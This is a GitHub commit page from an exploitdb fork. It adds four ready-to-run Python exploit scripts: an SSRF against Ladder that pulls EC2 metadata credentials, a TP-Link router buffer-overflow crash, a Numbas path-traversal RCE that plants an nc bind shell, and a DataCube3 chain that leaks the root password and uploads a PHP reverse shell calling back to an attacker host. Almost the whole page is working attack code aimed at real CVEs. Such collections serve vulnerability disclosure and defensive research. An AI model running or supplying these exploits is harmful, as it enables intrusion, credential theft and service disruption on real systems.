forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge remote-tracking branch 'upstream/main'
- Loading branch information
Showing
8 changed files
with
552 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF) | ||
# Date: 2024-01-20 | ||
# Exploit Author: @_chebuya | ||
# Software Link: https://github.com/everywall/ladder | ||
# Version: v0.0.1 - v0.0.21 | ||
# Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0) | ||
# CVE: CVE-2024-27620 | ||
# Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs | ||
|
||
import requests | ||
import json | ||
|
||
target_url = "http://127.0.0.1:8080/api/" | ||
imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance" | ||
|
||
r = requests.get(target_url + imdsv1_url) | ||
response_json = json.loads(r.text) | ||
print(response_json["body"]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS' | ||
# Date: 8/12/2023 | ||
# Exploit Author: Anish Feroz (ZEROXINN) | ||
# Vendor Homepage: http://www.tp-link.com | ||
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n | ||
# Tested on: TP-Link TL-WR740N | ||
|
||
#Description: | ||
|
||
#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router. | ||
|
||
#Usage: | ||
|
||
#python3 target username password | ||
#change port, if required | ||
|
||
------------------------------------------------POC----------------------------------------- | ||
|
||
#!/usr/bin/python | ||
|
||
import requests | ||
from requests.auth import HTTPBasicAuth | ||
import base64 | ||
|
||
def send_request(ip, username, password): | ||
auth_url = f"http://{ip}:8082" | ||
target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20" | ||
|
||
credentials = f"{username}:{password}" | ||
encoded_credentials = base64.b64encode(credentials.encode()).decode() | ||
|
||
headers = { | ||
"Host": f"{ip}:8082", | ||
"Authorization": f"Basic {encoded_credentials}", | ||
"Upgrade-Insecure-Requests": "1", | ||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36", | ||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", | ||
"Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm", | ||
"Accept-Encoding": "gzip, deflate", | ||
"Accept-Language": "en-US,en;q=0.9", | ||
"Connection": "close" | ||
} | ||
|
||
session = requests.Session() | ||
|
||
response = session.get(target_url, headers=headers) | ||
|
||
if response.status_code == 200: | ||
print("Server Crashed") | ||
print(response.text) | ||
else: | ||
print(f"Script Completed with status code {response.status_code}") | ||
|
||
ip_address = input("Enter IP address of the host: ") | ||
username = input("Enter username: ") | ||
password = input("Enter password: ") | ||
|
||
send_request(ip_address, username, password) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,167 @@ | ||
# Exploit Title: Numbas < v7.3 - Remote Code Execution | ||
# Google Dork: N/A | ||
# Date: March 7th, 2024 | ||
# Exploit Author: Matheus Boschetti | ||
# Vendor Homepage: https://www.numbas.org.uk/ | ||
# Software Link: https://github.com/numbas/Numbas | ||
# Version: 7.2 and below | ||
# Tested on: Linux | ||
# CVE: CVE-2024-27612 | ||
|
||
import sys, requests, re, argparse, subprocess, time | ||
from bs4 import BeautifulSoup | ||
|
||
s = requests.session() | ||
|
||
def getCSRF(target): | ||
url = f"http://{target}/" | ||
req = s.get(url) | ||
soup = BeautifulSoup(req.text, 'html.parser') | ||
csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value'] | ||
return csrfmiddlewaretoken | ||
|
||
def createTheme(target): | ||
# Format request | ||
csrfmiddlewaretoken = getCSRF(target) | ||
theme = 'ExampleTheme' | ||
boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1' | ||
data = ( | ||
f'--{boundary}\r\n' | ||
'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n' | ||
'\r\n' | ||
f'{csrfmiddlewaretoken}\r\n' | ||
f'--{boundary}\r\n' | ||
'Content-Disposition: form-data; name="name"\r\n' | ||
'\r\n' | ||
f'{theme}\r\n' | ||
f'--{boundary}--\r\n' | ||
) | ||
headers = {'Content-Type': f'multipart/form-data; boundary={boundary}', | ||
'User-Agent': 'Mozilla/5.0', | ||
'Accept': '*/*', | ||
'Connection': 'close'} | ||
|
||
# Create theme and return its ID | ||
req = s.post(f"http://{target}/theme/new/", headers=headers, data=data) | ||
redir = req.url | ||
split = redir.split('/') | ||
id = split[4] | ||
print(f"\t[i] Theme created with ID {id}") | ||
return id | ||
|
||
def login(target, user, passwd): | ||
print("\n[i] Attempting to login...") | ||
|
||
csrfmiddlewaretoken = getCSRF(target) | ||
data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, | ||
'username': user, | ||
'password': passwd, | ||
'next': '/'} | ||
|
||
# Login | ||
login = s.post(f"http://{target}/login/", data=data, allow_redirects=True) | ||
res = login.text | ||
if("Logged in as" not in res): | ||
print("\n\n[!] Login failed!") | ||
sys.exit(-1) | ||
|
||
# Check if logged and fetch ID | ||
usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res) | ||
if usermatch: | ||
user = usermatch.group(1) | ||
idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res) | ||
if idmatch: | ||
id = idmatch.group(1) | ||
print(f"\t[+] Logged in as \"{user}\" with ID {id}") | ||
|
||
def checkVuln(url): | ||
print("[i] Checking if target is vulnerable...") | ||
|
||
# Attempt to read files | ||
themeID = createTheme(url) | ||
target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.." | ||
hname = s.get(f"{target}/etc/hostname") | ||
ver = s.get(f"{target}/etc/issue") | ||
hnamesoup = BeautifulSoup(hname.text, 'html.parser') | ||
versoup = BeautifulSoup(ver.text, 'html.parser') | ||
hostname = hnamesoup.find('textarea').get_text().strip() | ||
version = versoup.find('textarea').get_text().strip() | ||
if len(hostname) < 1: | ||
print("\n\n[!] Something went wrong - target might not be vulnerable.") | ||
sys.exit(-1) | ||
print(f"\n[+] Target \"{hostname}\" is vulnerable!") | ||
print(f"\t[i] Running: \"{version}\"") | ||
|
||
# Cleanup - delete theme | ||
print(f"\t\t[i] Cleanup: deleting theme {themeID}...") | ||
target = f"http://{url}/themes/{themeID}/delete" | ||
csrfmiddlewaretoken = getCSRF(url) | ||
data = {'csrfmiddlewaretoken':csrfmiddlewaretoken} | ||
s.post(target, data=data) | ||
|
||
|
||
def replaceInit(target): | ||
# Overwrite __init__.py with arbitrary code | ||
rport = '8443' | ||
payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])" | ||
csrfmiddlewaretoken = getCSRF(target) | ||
filename = '../../../../numbas_editor/numbas/__init__.py' | ||
themeID = createTheme(target) | ||
data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, | ||
'source': payload, | ||
'filename': filename} | ||
|
||
print("[i] Delivering payload...") | ||
# Retry 5 times in case something goes wrong... | ||
for attempt in range(5): | ||
try: | ||
s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10) | ||
except Exception as e: | ||
pass | ||
|
||
# Establish connection to bind shell | ||
time.sleep(2) | ||
print(f"\t[+] Payload delivered, establishing connection...\n") | ||
if ":" in target: | ||
split = target.split(":") | ||
ip = split[0] | ||
else: | ||
ip = str(target) | ||
subprocess.Popen(["nc", "-n", ip, rport]) | ||
while True: | ||
pass | ||
|
||
|
||
def main(): | ||
parser = argparse.ArgumentParser() | ||
if len(sys.argv) <= 1: | ||
print("\n[!] No option provided!") | ||
print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n") | ||
print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty") | ||
sys.exit(-1) | ||
|
||
group = parser.add_mutually_exclusive_group(required=True) | ||
group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit') | ||
parser.add_argument('--target', help='Target IP:PORT') | ||
parser.add_argument('--user', help='Username to authenticate') | ||
parser.add_argument('--passwd', help='Password to authenticate') | ||
args = parser.parse_args() | ||
action = args.action | ||
target = args.target | ||
user = args.user | ||
passwd = args.passwd | ||
|
||
print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-") | ||
|
||
if action == 'check': | ||
login(target, user, passwd) | ||
checkVuln(target) | ||
elif action == 'exploit': | ||
login(target, user, passwd) | ||
replaceInit(target) | ||
else: | ||
sys.exit(-1) | ||
|
||
|
||
if __name__ == "__main__": | ||
main() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,145 @@ | ||
# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE' | ||
# Date: 7/28/2022 | ||
# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com) | ||
# Vendor Homepage: https://www.f-logic.jp | ||
# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf | ||
# Version: Ver1.0 | ||
# Tested on: DataCube3 version 1.0 (Ubuntu) | ||
# CVE : CVE-2024-25830 + CVE-2024-25832 | ||
|
||
# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload | ||
|
||
from __future__ import print_function, unicode_literals | ||
from bs4 import BeautifulSoup | ||
import argparse | ||
import requests | ||
import json | ||
import urllib3 | ||
import re | ||
urllib3.disable_warnings() | ||
|
||
def banner(): | ||
dataCube3Logo = """ | ||
▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓ | ||
▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓ | ||
▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ | ||
▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ | ||
▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ | ||
▒▒▒▒▒▒▒▒██ ██▓▓████▓▓ | ||
▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓ | ||
▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓ | ||
▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓ | ||
|
||
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mDataCube3 exploit chain reverse shell\033[1;m | ||
FOR EDUCATIONAL PURPOSE ONLY. | ||
""" | ||
return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo)) | ||
|
||
|
||
def extractRootPwd(RHOST, RPORT, protocol): | ||
url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT) | ||
try: | ||
response = requests.get(url, allow_redirects=False, verify=False, timeout=20) | ||
if response.status_code != 302: | ||
print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m') | ||
exit() | ||
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') | ||
scriptTag = str(soup.find_all('script')[12]).replace(' ', '') | ||
rawLeakedData = re.findall('configData:.*,', scriptTag)[0] | ||
jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0])) | ||
adminPassword = jsonLeakedData[12]['value'] | ||
rootPassword = jsonLeakedData[14]['value'] | ||
print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword)) | ||
return rootPassword | ||
except: | ||
print('[ERROR] Can\'t grab the DataCube3 version...') | ||
|
||
|
||
def generateAuthCookie(RHOST, RPORT, protocol, rootPassword): | ||
print('[INFO] Generating DataCube3 auth cookie ...') | ||
url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT) | ||
data = { | ||
'user_id': 'root', | ||
'user_pw': rootPassword, | ||
'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3' | ||
} | ||
try: | ||
response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20) | ||
if response.status_code != 302: | ||
print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m') | ||
exit() | ||
authCookie = response.cookies.get_dict() | ||
print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie)) | ||
return authCookie | ||
except: | ||
print('[ERROR] Can\'t grab the auth cookie, is the root password correct?') | ||
|
||
|
||
def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie): | ||
print('[INFO] Extracting Accesstime ...') | ||
url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT) | ||
try: | ||
response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20) | ||
if response.status_code != 302: | ||
print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m') | ||
exit() | ||
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') | ||
accessTime = soup.find('input', {'name': 'accesstime'}).get('value') | ||
print('[INFO] AccessTime value: {}'.format(accessTime)) | ||
return accessTime | ||
except: | ||
print('[ERROR] Can\'t grab the accesstime value, is the root password correct?') | ||
|
||
|
||
def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime): | ||
print('[INFO] Injecting PHP reverse shell script ...') | ||
filename='rvs.php' | ||
payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT) | ||
|
||
data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime) | ||
|
||
headers = { | ||
'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396' | ||
} | ||
url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT) | ||
try: | ||
response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20) | ||
if response.status_code != 302: | ||
print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m') | ||
exit() | ||
shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename) | ||
print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL)) | ||
return shellURL | ||
except: | ||
print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?') | ||
|
||
|
||
def execReverseShell(shellURL): | ||
print('[INFO] Executing reverse shell...') | ||
try: | ||
response = requests.get(shellURL, allow_redirects=False, verify=False) | ||
print('[INFO] Reverse shell successfully executed.') | ||
return | ||
except Exception as e: | ||
print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}') | ||
return False | ||
|
||
|
||
def main(): | ||
banner() | ||
args = parser.parse_args() | ||
protocol = 'https' if args.RPORT == 443 else 'http' | ||
rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol) | ||
authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword) | ||
accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie) | ||
shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime) | ||
execReverseShell(shellURL) | ||
|
||
|
||
if __name__ == '__main__': | ||
parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False) | ||
parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True) | ||
parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True) | ||
parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True) | ||
parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True) | ||
main() |
Oops, something went wrong.